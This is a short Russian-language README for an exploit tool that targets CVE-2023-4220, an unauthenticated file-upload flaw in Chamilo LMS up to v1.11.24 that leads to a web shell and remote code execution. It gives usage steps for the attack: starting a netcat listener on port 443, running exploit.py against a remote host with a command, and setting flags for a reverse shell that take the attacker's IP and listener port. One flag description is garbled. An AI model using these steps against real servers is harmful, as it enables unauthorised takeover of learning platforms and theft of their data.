CVE-2023-4220-RCE
Краткое описание
Уведомление Starlabs
- Затронутый продукт: Chamilo <= v1.11.24
- Описание: Неограниченная загрузка файлов в функциональности загрузки больших файлов в /main/inc/lib/javascript/bigupload/inc/bigUpload.php в Chamilo LMS <= v1.11.24 позволяет неаутентифицированным злоумышленникам выполнять хранимые межсайтовые сценарии и получать удаленное выполнение кода путем загрузки веб-шелла.
- Оценка CVSS: 8.1 (Высокий)
Использование
- Настройте netcat слушатель (если нужна обратная оболочка)
sudo nc -lnvp 443
- Запустите эксплойт
python3 exploit.py -u --url <REMOTE HOST>, -p --port [REMOTE PORT] -c --comand <COMMAND>
- Флаги для обратной оболочки
- -lh/--localhost: IP атакующего
- -lp/--localtcat порт слушателя